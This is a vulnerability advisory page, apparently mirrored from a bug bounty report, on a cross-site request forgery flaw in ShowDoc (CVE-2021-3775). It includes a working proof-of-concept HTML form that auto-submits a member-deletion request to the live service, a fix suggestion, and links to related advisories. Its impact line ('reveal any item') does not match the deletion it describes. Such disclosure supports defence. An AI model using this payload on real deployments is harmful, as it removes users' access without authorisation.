Lucene search
Amammad6A59D203-4CA7-4AED-BDB9-1E39B66C77B3HistorySep 06, 2021 - 10:19 a.m.
Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-09-0610:19:12
amammad
www.huntr.dev
5
0.001 Low
EPSS
Percentile
31.2%
✍️ Description
With CSRF vulnerability Attacker able to delete any member to of any item if users visit attacker website.
We can bypass the CSRF Protection if we put our payload on a iframe or a html file and send them to victim as after that the Origin header will be set to null and we can bypass CSRF protection.
🕵️♂️ Proof of Concept
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address test that already registered before for item with item_id 1531601670203344 will be deleted.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/delete" method="POST">
<input type="hidden" name="item_id" value="1531601670203344" />
<input type="hidden" name="item_member_id" value="187133" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of reveal any item.
Fix
Set SameSite attribute of cookies to Lax or Strict.
Related
osv
osv
CVE-2021-3775
2021-11-13 10:15:07
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:16:17
prion
prion
Cross site request forgery (csrf)
2021-11-13 10:15:00
cve
cve
CVE-2021-3775
2021-11-13 10:15:07
nvd
nvd
CVE-2021-3775
2021-11-13 10:15:07
github
github
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:16:17
veracode
veracode
Cross-site Request Forgery (CSRF)
2021-11-15 04:16:06
cnvd
cnvd
ShowDoc Cross-Site Request Forgery Vulnerability (CNVD-2021-89159)
2021-11-16 00:00:00
cvelist
cvelist
CVE-2021-3775 Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-11-13 09:25:10